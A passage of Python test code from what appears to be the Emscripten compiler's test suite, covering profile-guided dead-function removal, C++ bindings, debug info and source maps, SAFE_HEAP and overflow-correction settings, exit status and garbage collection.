Settings.PGO = 0
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgo.js'))
pgo_output = run_js(self.in_dir('pgo.js')).split('\n')[1]
open('pgo_data.rsp', 'w').write(pgo_output)
# with response file
self.emcc_args += ['@pgo_data.rsp']
self.do_run(src, output)
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed.js'))
before = len(open('normal.js').read())
after = len(open('pgoed.js').read())
assert after < 0.90 * before, [before, after] # expect a size reduction
# with response in settings element itself
open('dead_funcs', 'w').write(pgo_output[pgo_output.find('['):-1])
self.emcc_args += ['-s', 'DEAD_FUNCTIONS=@' + self.in_dir('dead_funcs')]
self.do_run(src, output)
self.emcc_args.pop()
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed2.js'))
assert open('pgoed.js').read() == open('pgoed2.js').read()
# with relative response in settings element itself
open('dead_funcs', 'w').write(pgo_output[pgo_output.find('['):-1])
self.emcc_args += ['-s', 'DEAD_FUNCTIONS=@dead_funcs']
self.do_run(src, output)
self.emcc_args.pop()
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed2.js'))
assert open('pgoed.js').read() == open('pgoed2.js').read()
def test_exported_response(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
#include <stdlib.h>
extern "C" {
int other_function() { return 5; }
}
int main() {
printf("waka!\n");
return 0;
}
'''
open('exps', 'w').write('["_main","_other_function"]')
self.emcc_args += ['-s', 'EXPORTED_FUNCTIONS=@exps']
self.do_run(src, '''waka!''')
assert 'other_function' in open('src.cpp.o.js').read()
def test_add_function(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.INVOKE_RUN = 0
Settings.RESERVED_FUNCTION_POINTERS = 1
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
int fp = atoi(argv[1]);
printf("fp: %d\n", fp);
void (*f)(int) = reinterpret_cast<void (*)(int)>(fp);
f(7);
return 0;
}
'''
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var newFuncPtr = Runtime.addFunction(function(num) {
Module.print('Hello ' + num + ' from JS!');
});
Module.callMain([newFuncPtr.toString()]);
''')
self.emcc_args += ['--post-js', 'post.js']
self.do_run(src, '''Hello 7 from JS!''')
if Settings.ASM_JS:
Settings.RESERVED_FUNCTION_POINTERS = 0
self.do_run(src, '''Finished up all reserved function pointers. Use a higher value for RESERVED_FUNCTION_POINTERS.''')
generated = open('src.cpp.o.js').read()
assert 'jsCall' not in generated
Settings.RESERVED_FUNCTION_POINTERS = 1
Settings.ALIASING_FUNCTION_POINTERS = 1 - Settings.ALIASING_FUNCTION_POINTERS # flip the test
self.do_run(src, '''Hello 7 from JS!''')
def test_embind(self):
if self.emcc_args is None: return self.skip('requires emcc')
Building.COMPILER_TEST_OPTS += ['--bind']
src = r'''
#include<stdio.h>
#include<emscripten/val.h>
using namespace emscripten;
int main() {
val Math = val::global("Math");
// two ways to call Math.abs
printf("abs(-10): %d\n", Math.call<int>("abs", -10));
printf("abs(-11): %d\n", Math["abs"](-11).as<int>());
return 0;
}
'''
self.do_run(src, 'abs(-10): 10\nabs(-11): 11');
def test_scriptaclass(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.EXPORT_BINDINGS = 1
header_filename = os.path.join(self.get_dir(), 'header.h')
header = '''
struct ScriptMe {
int value;
ScriptMe(int val);
int getVal(); // XXX Sadly, inlining these will result in LLVM not
// producing any code for them (when just building
// as a library)
void mulVal(int mul);
};
'''
h = open(header_filename, 'w')
h.write(header)
h.close()
src = '''
#include "header.h"
ScriptMe::ScriptMe(int val) : value(val) { }
int ScriptMe::getVal() { return value; }
void ScriptMe::mulVal(int mul) { value *= mul; }
'''
# Way 1: use demangler and namespacer
script_src = '''
var sme = Module._.ScriptMe.__new__(83); // malloc(sizeof(ScriptMe)), ScriptMe::ScriptMe(sme, 83) / new ScriptMe(83) (at addr sme)
Module._.ScriptMe.mulVal(sme, 2); // ScriptMe::mulVal(sme, 2) sme.mulVal(2)
Module.print('*' + Module._.ScriptMe.getVal(sme) + '*');
_free(sme);
Module.print('*ok*');
'''
post = '''
def process(filename):
Popen([PYTHON, DEMANGLER, filename], stdout=open(filename + '.tmp', 'w')).communicate()
Popen([PYTHON, NAMESPACER, filename, filename + '.tmp'], stdout=open(filename + '.tmp2', 'w')).communicate()
src = open(filename, 'r').read().replace(
'// {{MODULE_ADDITIONS}',
'Module["_"] = ' + open(filename + '.tmp2', 'r').read().replace('var ModuleNames = ', '').rstrip() + ';\n\n' + script_src + '\n\n' +
'// {{MODULE_ADDITIONS}'
)
open(filename, 'w').write(src)
'''
# XXX disable due to possible v8 bug -- self.do_run(src, '*166*\n*ok*', post_build=post)
if self.emcc_args is not None and '-O2' in self.emcc_args and 'ASM_JS=0' not in self.emcc_args: # without asm, closure minifies Math.imul badly
self.emcc_args += ['--closure', '1'] # Use closure here, to test we export things right
# Way 2: use CppHeaderParser
Settings.RUNTIME_TYPE_INFO = 1
header = '''
#include <stdio.h>
class Parent {
protected:
int value;
public:
Parent(int val);
Parent(Parent *p, Parent *q); // overload constructor
int getVal() { return value; }; // inline should work just fine here, unlike Way 1 before
void mulVal(int mul);
};
class Child1 : public Parent {
public:
Child1() : Parent(7) { printf("Child1:%d\\n", value); };
Child1(int val) : Parent(val*2) { value -= 1; printf("Child1:%d\\n", value); };
int getValSqr() { return value*value; }
int getValSqr(int more) { return value*value*more; }
int getValTimes(int times=1) { return value*times; }
};
class Child2 : public Parent {
public:
Child2() : Parent(9) { printf("Child2:%d\\n", value); };
int getValCube() { return value*value*value; }
static void printStatic() { printf("*static*\\n"); }
virtual void virtualFunc() { printf("*virtualf*\\n"); }
virtual void virtualFunc2() { printf("*virtualf2*\\n"); }
static void runVirtualFunc(Child2 *self) { self->virtualFunc(); };
private:
void doSomethingSecret() { printf("security breached!\\n"); }; // we should not be able to do this
};
'''
open(header_filename, 'w').write(header)
basename = os.path.join(self.get_dir(), 'bindingtest')
output = Popen([PYTHON, BINDINGS_GENERATOR, basename, header_filename], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
#print output
assert 'Traceback' not in output, 'Failure in binding generation: ' + output
src = '''
#include "header.h"
Parent::Parent(int val) : value(val) { printf("Parent:%d\\n", val); }
Parent::Parent(Parent *p, Parent *q) : value(p->value + q->value) { printf("Parent:%d\\n", value); }
void Parent::mulVal(int mul) { value *= mul; }
#include "bindingtest.cpp"
'''
post2 = '''
def process(filename):
src = open(filename, 'a')
src.write(open('bindingtest.js').read() + '\\n\\n')
src.close()
'''
def post3(filename):
script_src_2 = '''
var sme = new Module.Parent(42);
sme.mulVal(2);
Module.print('*')
Module.print(sme.getVal());
Module.print('c1');
var c1 = new Module.Child1();
Module.print(c1.getVal());
c1.mulVal(2);
Module.print(c1.getVal());
Module.print(c1.getValSqr());
Module.print(c1.getValSqr(3));
Module.print(c1.getValTimes()); // default argument should be 1
Module.print(c1.getValTimes(2));
Module.print('c1 v2');
c1 = new Module.Child1(8); // now with a parameter, we should handle the overloading automatically and properly and use constructor #2
Module.print(c1.getVal());
c1.mulVal(2);
Module.print(c1.getVal());
Module.print(c1.getValSqr());
Module.print(c1.getValSqr(3));
Module.print('c2')
var c2 = new Module.Child2();
Module.print(c2.getVal());
c2.mulVal(2);
Module.print(c2.getVal());
Module.print(c2.getValCube());
var succeeded;
try {
succeeded = 0;
Module.print(c2.doSomethingSecret()); // should fail since private
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
try {
succeeded = 0;
Module.print(c2.getValSqr()); // function from the other class
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
try {
succeeded = 0;
c2.getValCube(); // sanity
succeeded = 1;
} catch(e) {}
Module.print(succeeded);
Module.Child2.prototype.printStatic(); // static calls go through the prototype
// virtual function
c2.virtualFunc();
Module.Child2.prototype.runVirtualFunc(c2);
c2.virtualFunc2();
// extend the class from JS
var c3 = new Module.Child2;
Module.customizeVTable(c3, [{
original: Module.Child2.prototype.virtualFunc,
replacement: function() {
Module.print('*js virtualf replacement*');
}
}, {
original: Module.Child2.prototype.virtualFunc2,
replacement: function() {
Module.print('*js virtualf2 replacement*');
}
}]);
c3.virtualFunc();
Module.Child2.prototype.runVirtualFunc(c3);
c3.virtualFunc2();
c2.virtualFunc(); // original should remain the same
Module.Child2.prototype.runVirtualFunc(c2);
c2.virtualFunc2();
Module.print('*ok*');
'''
src = open(filename, 'a')
src.write(script_src_2 + '\n')
src.close()
Settings.RESERVED_FUNCTION_POINTERS = 20
self.do_run(src, '''*
84
c1
Parent:7
Child1:7
7
14
196
588
14
28
c1 v2
Parent:16
Child1:15
15
30
900
2700
c2
Parent:9
Child2:9
9
18
5832
0
0
1
*static*
*virtualf*
*virtualf*
*virtualf2*''' + ('''
Parent:9
Child2:9
*js virtualf replacement*
*js virtualf replacement*
*js virtualf2 replacement*
*virtualf*
*virtualf*
*virtualf2*''') + '''
*ok*
''', post_build=(post2, post3))
def test_scriptaclass_2(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.EXPORT_BINDINGS = 1
header_filename = os.path.join(self.get_dir(), 'header.h')
header = '''
#include <stdio.h>
#include <string.h>
class StringUser {
char *s;
int i;
public:
StringUser(char *string, int integer) : s(strdup(string)), i(integer) {}
void Print(int anotherInteger, char *anotherString) {
printf("|%s|%d|%s|%d|\\n", s, i, anotherString, anotherInteger);
}
void CallOther(StringUser *fr) { fr->Print(i, s); }
};
'''
open(header_filename, 'w').write(header)
basename = os.path.join(self.get_dir(), 'bindingtest')
output = Popen([PYTHON, BINDINGS_GENERATOR, basename, header_filename], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
#print output
assert 'Traceback' not in output, 'Failure in binding generation: ' + output
src = '''
#include "header.h"
#include "bindingtest.cpp"
'''
post = '''
def process(filename):
src = open(filename, 'a')
src.write(open('bindingtest.js').read() + '\\n\\n')
src.write(\'\'\'
var user = new Module.StringUser("hello", 43);
user.Print(41, "world");
\'\'\')
src.close()
'''
self.do_run(src, '|hello|43|world|41|', post_build=post)
def test_typeinfo(self):
if self.emcc_args is not None and self.emcc_args != []: return self.skip('full LLVM opts optimize out all the code that uses the type')
Settings.RUNTIME_TYPE_INFO = 1
if Settings.QUANTUM_SIZE != 4: return self.skip('We assume normal sizes in the output here')
src = '''
#include<stdio.h>
struct UserStruct {
int x;
char y;
short z;
};
struct Encloser {
short x;
UserStruct us;
int y;
};
int main() {
Encloser e;
e.us.y = 5;
printf("*ok:%d*\\n", e.us.y);
return 0;
}
'''
post = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{POST_RUN_ADDITIONS}}',
\'\'\'
if (Runtime.typeInfo) {
Module.print('|' + Runtime.typeInfo.UserStruct.fields + '|' + Runtime.typeInfo.UserStruct.flatIndexes + '|');
var t = Runtime.generateStructInfo(['x', { us: ['x', 'y', 'z'] }, 'y'], 'Encloser')
Module.print('|' + [t.x, t.us.x, t.us.y, t.us.z, t.y] + '|');
Module.print('|' + JSON.stringify(Runtime.generateStructInfo(['x', 'y', 'z'], 'UserStruct')) + '|');
} else {
Module.print('No type info.');
}
\'\'\'
)
open(filename, 'w').write(src)
'''
self.do_run(src,
'*ok:5*\n|i32,i8,i16|0,4,6|\n|0,4,8,10,12|\n|{"__size__":8,"x":0,"y":4,"z":6}|',
post_build=post)
# Make sure that without the setting, we don't spam the .js with the type info
Settings.RUNTIME_TYPE_INFO = 0
self.do_run(src, 'No type info.', post_build=post)
### Tests for tools
def test_safe_heap(self):
if not Settings.SAFE_HEAP: return self.skip('We need SAFE_HEAP to test SAFE_HEAP')
if Settings.USE_TYPED_ARRAYS == 2: return self.skip('It is ok to violate the load-store assumption with TA2')
if Building.LLVM_OPTS: return self.skip('LLVM can optimize away the intermediate |x|')
src = '''
#include<stdio.h>
#include<stdlib.h>
int main() { int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
printf("*ok*\\n");
return 0;
}
'''
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And we should not fail if we disable checking on that line
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ["src.cpp:7"]
self.do_run(src, '*ok*')
# But if we disable the wrong lines, we still fail
Settings.SAFE_HEAP_LINES = ["src.cpp:99"]
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And reverse the checks with = 2
Settings.SAFE_HEAP = 2
Settings.SAFE_HEAP_LINES = ["src.cpp:99"]
self.do_run(src, '*ok*')
Settings.SAFE_HEAP = 1
# Linking multiple files should work too
module = '''
#include<stdio.h>
#include<stdlib.h>
void callFunc() { int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
}
'''
module_name = os.path.join(self.get_dir(), 'module.cpp')
open(module_name, 'w').write(module)
main = '''
#include<stdio.h>
#include<stdlib.h>
extern void callFunc();
int main() { callFunc();
int *x = (int*)malloc(sizeof(int));
*x = 20;
float *y = (float*)x;
printf("%f\\n", *y);
printf("*ok*\\n");
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.cpp')
open(main_name, 'w').write(main)
Building.emcc(module_name, ['-g'])
Building.emcc(main_name, ['-g'])
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([module_name + '.o', main_name + '.o'], all_name)
try:
self.do_ll_run(all_name, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
# And we should not fail if we disable checking on those lines
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ["module.cpp:7", "main.cpp:9"]
self.do_ll_run(all_name, '*ok*')
# But we will fail if we do not disable exactly what we need to - any mistake leads to error
for lines in [["module.cpp:22", "main.cpp:9"], ["module.cpp:7", "main.cpp:29"], ["module.cpp:127", "main.cpp:449"], ["module.cpp:7"], ["main.cpp:9"]]:
Settings.SAFE_HEAP_LINES = lines
try:
self.do_ll_run(all_name, '*nothingatall*')
except Exception, e:
# This test *should* fail, by throwing this exception
assert 'Assertion failed: Load-store consistency assumption failure!' in str(e), str(e)
def test_debug(self):
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
if self.emcc_args is not None:
if '-O1' in self.emcc_args or '-O2' in self.emcc_args: return self.skip('optimizations remove LLVM debug info')
src = '''
#include <stdio.h>
#include <assert.h>
void checker(int x) {
x += 20;
assert(x < 15); // this is line 7!
}
int main() {
checker(10);
return 0;
}
'''
try:
self.do_run(src, '*nothingatall*')
except Exception, e:
# This test *should* fail
assert 'Assertion failed: x < 15' in str(e), str(e)
lines = open('src.cpp.o.js', 'r').readlines()
lines = filter(lambda line: '___assert_fail(' in line or '___assert_func(' in line, lines)
found_line_num = any(('//@line 7 "' in line) for line in lines)
found_filename = any(('src.cpp"\n' in line) for line in lines)
assert found_line_num, 'Must have debug info with the line number'
assert found_filename, 'Must have debug info with the filename'
def test_source_map(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("doesn't pass without typed arrays")
if NODE_JS not in JS_ENGINES: return self.skip('sourcemapper requires Node to run')
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
src = '''
#include <stdio.h>
#include <assert.h>
__attribute__((noinline)) int foo() {
printf("hi"); // line 6
return 1; // line 7
}
int main() {
printf("%d", foo()); // line 11
return 0; // line 12
}
'''
dirname = self.get_dir()
src_filename = os.path.join(dirname, 'src.cpp')
out_filename = os.path.join(dirname, 'a.out.js')
no_maps_filename = os.path.join(dirname, 'no-maps.out.js')
with open(src_filename, 'w') as f: f.write(src)
assert '-g4' not in Building.COMPILER_TEST_OPTS
Building.emcc(src_filename, Settings.serialize() + self.emcc_args +
Building.COMPILER_TEST_OPTS, out_filename)
# the file name may find its way into the generated code, so make sure we
# can do an apples-to-apples comparison by compiling with the same file name
shutil.move(out_filename, no_maps_filename)
with open(no_maps_filename) as f: no_maps_file = f.read()
no_maps_file = re.sub(' *//@.*$', '', no_maps_file, flags=re.MULTILINE)
Building.COMPILER_TEST_OPTS.append('-g4')
def build_and_check():
import json
Building.emcc(src_filename, Settings.serialize() + self.emcc_args +
Building.COMPILER_TEST_OPTS, out_filename, stderr=PIPE)
with open(out_filename) as f: out_file = f.read()
# after removing the @line and @sourceMappingURL comments, the build
# result should be identical to the non-source-mapped debug version.
# this is worth checking because the parser AST swaps strings for token
# objects when generating source maps, so we want to make sure the
# optimizer can deal with both types.
out_file = re.sub(' *//@.*$', '', out_file, flags=re.MULTILINE)
def clean(code):
return code.replace('{\n}', '{}')
self.assertIdentical(clean(no_maps_file), clean(out_file))
map_filename = out_filename + '.map'
data = json.load(open(map_filename, 'r'))
self.assertIdentical(out_filename, data['file'])
self.assertIdentical(src_filename, data['sources'][0])
self.assertIdentical(src, data['sourcesContent'][0])
mappings = json.loads(jsrun.run_js(
path_from_root('tools', 'source-maps', 'sourcemap2json.js'),
tools.shared.NODE_JS, [map_filename]))
seen_lines = set()
for m in mappings:
self.assertIdentical(src_filename, m['source'])
seen_lines.add(m['originalLine'])
# ensure that all the 'meaningful' lines in the original code get mapped
assert seen_lines.issuperset([6, 7, 11, 12])
# EMCC_DEBUG=2 causes lots of intermediate files to be written, and so
# serves as a stress test for source maps because it needs to correlate
# line numbers across all those files.
old_emcc_debug = os.environ.get('EMCC_DEBUG', None)
os.environ.pop('EMCC_DEBUG', None)
try:
build_and_check()
os.environ['EMCC_DEBUG'] = '2'
build_and_check()
finally:
if old_emcc_debug is not None:
os.environ['EMCC_DEBUG'] = old_emcc_debug
else:
os.environ.pop('EMCC_DEBUG', None)
def test_exception_source_map(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("doesn't pass without typed arrays")
if '-g4' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g4')
if NODE_JS not in JS_ENGINES: return self.skip('sourcemapper requires Node to run')
src = '''
#include <stdio.h>
__attribute__((noinline)) void foo(int i) {
if (i < 10) throw i; // line 5
}
int main() {
int i;
scanf("%d", &i);
foo(i);
return 0;
}
'''
def post(filename):
import json
map_filename = filename + '.map'
mappings = json.loads(jsrun.run_js(
path_from_root('tools', 'source-maps', 'sourcemap2json.js'),
tools.shared.NODE_JS, [map_filename]))
with open(filename) as f: lines = f.readlines()
for m in mappings:
if m['originalLine'] == 5 and '__cxa_throw' in lines[m['generatedLine']]:
return
assert False, 'Must label throw statements with line numbers'
dirname = self.get_dir()
self.build(src, dirname, os.path.join(dirname, 'src.cpp'), post_build=(None, post))
def test_linespecific(self):
if Settings.ASM_JS: return self.skip('asm always has corrections on')
if '-g' not in Building.COMPILER_TEST_OPTS: Building.COMPILER_TEST_OPTS.append('-g')
if self.emcc_args:
self.emcc_args += ['--llvm-opts', '0'] # llvm full opts make the expected failures here not happen
Building.COMPILER_TEST_OPTS += ['--llvm-opts', '0']
Settings.CHECK_SIGNS = 0
Settings.CHECK_OVERFLOWS = 0
# Signs
src = '''
#include <stdio.h>
#include <assert.h>
int main()
{
int varey = 100;
unsigned int MAXEY = -1;
printf("*%d*\\n", varey >= MAXEY); // 100 >= -1? not in unsigned!
}
'''
Settings.CORRECT_SIGNS = 0
self.do_run(src, '*1*') # This is a fail - we expect 0
Settings.CORRECT_SIGNS = 1
self.do_run(src, '*0*') # Now it will work properly
# And now let's fix just that one line
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["src.cpp:9"]
self.do_run(src, '*0*')
# Fixing the wrong line should not work
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["src.cpp:3"]
self.do_run(src, '*1*')
# And reverse the checks with = 2
Settings.CORRECT_SIGNS = 3
Settings.CORRECT_SIGNS_LINES = ["src.cpp:3"]
self.do_run(src, '*0*')
Settings.CORRECT_SIGNS = 3
Settings.CORRECT_SIGNS_LINES = ["src.cpp:9"]
self.do_run(src, '*1*')
Settings.CORRECT_SIGNS = 0
# Overflows
src = '''
#include<stdio.h>
int main() {
int t = 77;
for (int i = 0; i < 30; i++) {
t = t + t + t + t + t + 1;
}
printf("*%d,%d*\\n", t, t & 127);
return 0;
}
'''
correct = '*186854335,63*'
Settings.CORRECT_OVERFLOWS = 0
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
Settings.CORRECT_OVERFLOWS = 1
self.do_run(src, correct) # Now it will work properly
# And now let's fix just that one line
Settings.CORRECT_OVERFLOWS = 2
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:6"]
self.do_run(src, correct)
# Fixing the wrong line should not work
Settings.CORRECT_OVERFLOWS = 2
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:3"]
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
# And reverse the checks with = 2
Settings.CORRECT_OVERFLOWS = 3
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:3"]
self.do_run(src, correct)
Settings.CORRECT_OVERFLOWS = 3
Settings.CORRECT_OVERFLOWS_LINES = ["src.cpp:6"]
try:
self.do_run(src, correct)
raise Exception('UNEXPECTED-PASS')
except Exception, e:
assert 'UNEXPECTED' not in str(e), str(e)
assert 'Expected to find' in str(e), str(e)
Settings.CORRECT_OVERFLOWS = 0
# Roundings
src = '''
#include <stdio.h>
#include <assert.h>
int main()
{
TYPE x = -5;
printf("*%d*", x/2);
x = 5;
printf("*%d*", x/2);
float y = -5.33;
x = y;
printf("*%d*", x);
y = 5.33;
x = y;
printf("*%d*", x);
printf("\\n");
}
'''
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 0
self.do_run(src.replace('TYPE', 'long long'), '*-3**2**-6**5*') # JS floor operations, always to the negative. This is an undetected error here!
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # We get these right, since they are 32-bit and we can shortcut using the |0 trick
self.do_run(src.replace('TYPE', 'unsigned int'), '*-2**2**-6**5*')
Settings.CORRECT_ROUNDINGS = 1
Settings.CORRECT_SIGNS = 1 # To be correct here, we need sign corrections as well
self.do_run(src.replace('TYPE', 'long long'), '*-2**2**-5**5*') # Correct
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # Correct
self.do_run(src.replace('TYPE', 'unsigned int'), '*2147483645**2**-5**5*') # Correct
Settings.CORRECT_SIGNS = 0
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 2
Settings.CORRECT_ROUNDINGS_LINES = ["src.cpp:13"] # Fix just the last mistake
self.do_run(src.replace('TYPE', 'long long'), '*-3**2**-5**5*')
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*') # Here we are lucky and also get the first one right
self.do_run(src.replace('TYPE', 'unsigned int'), '*-2**2**-5**5*')
# And reverse the check with = 2
if Settings.USE_TYPED_ARRAYS != 2: # the errors here are very specific to non-i64 mode 1
Settings.CORRECT_ROUNDINGS = 3
Settings.CORRECT_ROUNDINGS_LINES = ["src.cpp:999"]
self.do_run(src.replace('TYPE', 'long long'), '*-2**2**-5**5*')
self.do_run(src.replace('TYPE', 'int'), '*-2**2**-5**5*')
Settings.CORRECT_SIGNS = 1 # To be correct here, we need sign corrections as well
self.do_run(src.replace('TYPE', 'unsigned int'), '*2147483645**2**-5**5*')
Settings.CORRECT_SIGNS = 0
def test_exit_status(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
static void cleanup() {
printf("cleanup\n");
}
int main()
{
atexit(cleanup); // this atexit should still be called
printf("hello, world!\n");
exit(118); // Unusual exit status to make sure it's working!
}
'''
self.do_run(src, 'hello, world!\ncleanup\nExit Status: 118')
def test_gc(self):
if self.emcc_args == None: return self.skip('needs ta2')
if Settings.ASM_JS: return self.skip('asm cannot support generic function table')
Settings.GC_SUPPORT = 1
src = r'''
#include <stdio.h>
#include <gc.h>
#include <assert.h>
void *global;
void finalizer(void *ptr, void *arg) {
printf("finalizing %d (global == %d)\n", (int)arg, ptr == global);
}
void finalizer2(void *ptr, void *arg) {
printf("finalizing2 %d (global == %d)\n", (int)arg, ptr == global);
}
int main() {
GC_INIT();
void *local, *local2, *local3, *local4, *local5, *local6;
// Hold on to global, drop locals
global = GC_MALLOC(1024); // rooted since in a static allocation
GC_REGISTER_FINALIZER_NO_ORDER(global, finalizer, 0, 0, 0);
printf("alloc %p\n", global);
local = GC_MALLOC(1024); // not rooted since stack is not scanned
GC_REGISTER_FINALIZER_NO_ORDER(local, finalizer, (void*)1, 0, 0);
printf("alloc %p\n", local);
assert((char*)local - (char*)global >= 1024 || (char*)global - (char*)local >= 1024);
local2 = GC_MALLOC(1024); // no finalizer
printf("alloc %p\n", local2);
local3 = GC_MALLOC(1024); // with finalizable2
GC_REGISTER_FINALIZER_NO_ORDER(local3, finalizer2, (void*)2, 0, 0);
printf("alloc %p\n", local);
local4 = GC_MALLOC(1024); // yet another
GC_REGISTER_FINALIZER_NO_ORDER(local4, finalizer2, (void*)3, 0, 0);
printf("alloc %p\n", local);
printf("basic test\n");
GC_FORCE_COLLECT();
printf("*\n");
GC_FREE(global); // force free will actually work
// scanning inside objects
global = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(global, finalizer, 0, 0, 0);
local = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local, finalizer, (void*)1, 0, 0);
local2 = GC_MALLOC_ATOMIC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local2, finalizer, (void*)2, 0, 0);
local3 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local3, finalizer, (void*)3, 0, 0);
local4 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local4, finalizer, (void*)4, 0, 0);
local5 = GC_MALLOC_UNCOLLECTABLE(12);
// This should never trigger since local5 is uncollectable
GC_REGISTER_FINALIZER_NO_ORDER(local5, finalizer, (void*)5, 0, 0);
printf("heap size = %d\n", GC_get_heap_size());
local4 = GC_REALLOC(local4, 24);
printf("heap size = %d\n", GC_get_heap_size());
local6 = GC_MALLOC(12);
GC_REGISTER_FINALIZER_NO_ORDER(local6, finalizer, (void*)6, 0, 0);
// This should be the same as a free
GC_REALLOC(local6, 0);
void **globalData = (void**)global;
globalData[0] = local;
globalData[1] = local2;
void **localData = (void**)local;
localData[0] = local3;
void **local2Data = (void**)local2;
local2Data[0] = local4; // actually ignored, because local2 is atomic, so 4 is freeable
printf("object scan test test\n");
GC_FORCE_COLLECT();
printf("*\n");
GC_FREE(global); // force free will actually work
printf("*\n");
GC_FORCE_COLLECT();
printf(".\n");
global = 0;
return 0;
}
'''
self.do_run(src, '''basic test
finalizing 1 (global == 0)
finalizing2 2 (global == 0)
finalizing2 3 (global == 0)
*
finalizing 0 (global == 1)
heap size = 72
heap size = 84
finalizing 6 (global == 0)
object scan test test
finalizing 4 (global == 0)
*
finalizing 0 (global == 1)
*
finalizing 1 (global == 0)
finalizing 2 (global == 0)
finalizing 3 (global == 0)
.
''')
# Generate tests for everything
def make_run(fullname, name=-1, compiler=-1, embetter=0, quantum_size=0,
typed_arrays=0, emcc_args=None, env=None):
if env is None: env = {}
TT = type(fullname, (T,), dict(run_name = fullname, env = env))
def tearDown(self):
super(TT, self).tearDown()
for k, v in self.env.iteritems():
del os.environ[k]
TT.tearDown = tearDown
def setUp(self):
super(TT, self).setUp()
for k, v in self.env.iteritems():
assert k not in os.environ, k + ' should not be in environment'
os.environ[k] = v
global checked_sanity
if not checked_sanity:
print '(checking sanity from test runner)' # do this after we set env stuff
check_sanity(force=True)
checked_sanity = True
Building.COMPILER_TEST_OPTS = ['-g']
os.chdir(self.get_dir()) # Ensure the directory exists and go there
Building.COMPILER = compiler
self.emcc_args = None if emcc_args is None else emcc_args[:]
if self.emcc_args is not None:
Settings.load(self.emcc_args)
Building.LLVM_OPTS = 0
if '-O2' in self.emcc_args:
Building.COMPILER_TEST_OPTS = [] # remove -g in -O2 tests, for more coverage
#Building.COMPILER_TEST_OPTS += self.emcc_args
for arg in self.emcc_args:
if arg.startswith('-O'):
Building.COMPILER_TEST_OPTS.append(arg) # so bitcode is optimized too, this is for cpp to ll
else:
try:
key, value = arg.split('=')
Settings[key] = value # forward -s K=V
except:
pass
return
# TODO: Move much of these to a init() function in shared.py, and reuse that
Settings.USE_TYPED_ARRAYS = typed_arrays
Settings.INVOKE_RUN = 1
Settings.RELOOP = 0 # we only do them in the "o2" pass
Settings.MICRO_OPTS = embetter
Settings.QUANTUM_SIZE = quantum_size
Settings.ASSERTIONS = 1-embetter
Settings.SAFE_HEAP = 1-embetter
Settings.CHECK_OVERFLOWS = 1-embetter
Settings.CORRECT_OVERFLOWS = 1-embetter
Settings.CORRECT_SIGNS = 0
Settings.CORRECT_ROUNDINGS = 0
Settings.CORRECT_OVERFLOWS_LINES = CORRECT_SIGNS_LINES = CORRECT_ROUNDINGS_LINES = SAFE_HEAP_LINES = []
Settings.CHECK_SIGNS = 0 #1-embetter
Settings.RUNTIME_TYPE_INFO = 0
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.INCLUDE_FULL_LIBRARY = 0
